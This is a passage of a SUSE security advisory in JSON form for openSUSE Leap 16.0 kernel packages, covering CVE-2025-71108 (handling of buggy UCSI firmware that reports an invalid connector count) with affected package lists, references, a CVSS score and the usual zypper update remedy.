"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71101"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
